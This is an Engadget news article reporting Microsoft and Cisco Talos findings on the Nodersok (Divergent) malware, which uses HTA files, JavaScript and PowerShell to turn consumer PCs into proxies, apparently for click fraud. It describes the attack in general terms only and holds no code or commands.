Latest in Gear

Image credit: sasha85ru via Getty Images

Malware uses web apps to turn PCs into conduits for attacks

Thousands of systems have been targeted.
457 Shares
Share
Tweet
Share

Sponsored Links

sasha85ru via Getty Images

It's not just botnets that can hijack PCs for nefarious ends. Microsoft and Cisco's Talos researchers have identified a new malware strain, Nodersok (or Divergent), that uses web apps to turn systems into proxies for malicious internet traffic. The attack gets victims to run an HTA (HTML application) file through a rogue ad or download, launching a complex sequence of events. JavaScript in the HTA downloads a separate JavaScript file, and that in turn runs a PowerShell command that downloads and runs a whole host of tools, including ones that disable Windows Defender, ask for more control, capture data packets and create the intended proxy.

Crucially, the infection relies on legitimate programs to accomplish its task, whether they're built into Windows or downloaded from third parties. There are no malware programs copied to storage. The approach makes it harder for security teams to research the code and devise countermeasures.

It's not certain who's behind Nodersok. It appears to be meant for everyday criminals rather than hostile countries, however. Cisco believed that i was "primarily designed" for click fraud, or the practice of automatically generating ad clicks to boost revenue from websites. Most targets are typical consumers in Europe and the US rather than corporate or government users.

Both Microsoft and Cisco are keen to tout the ability of their enterprise-grade defense systems to thwart the malware. Most people don't have access to those to those resources, though, and conventional signature-based antivirus software has a much harder time. Nodersok has targeted "thousands of machines" in recent weeks, according to Microsoft, and that might not let up in the near future.

Via: ZDNet
Source: Microsoft, Talos
All products recommended by Engadget are selected by our editorial team, independent of our parent company. Some of our stories include affiliate links. If you buy something through one of these links, we may earn an affiliate commission.
Comment
Comments
Share
457 Shares
Share
Tweet
Share

Popular on Engadget

NASA picks space tourism outfit for its first commercial ISS module

NASA picks space tourism outfit for its first commercial ISS module

View
Billie Eilish proved anyone can access Grammy-winning gear

Billie Eilish proved anyone can access Grammy-winning gear

View
Intel is patching its Zombieload CPU security flaw for the third time

Intel is patching its Zombieload CPU security flaw for the third time

View
Atari-themed gaming hotels are coming to eight US cities

Atari-themed gaming hotels are coming to eight US cities

View
The company behind the Eve V laptop is back with crowd-developed monitors

The company behind the Eve V laptop is back with crowd-developed monitors

View

From around the web

Page 1Page 1ear iconeye iconFill 23text filevr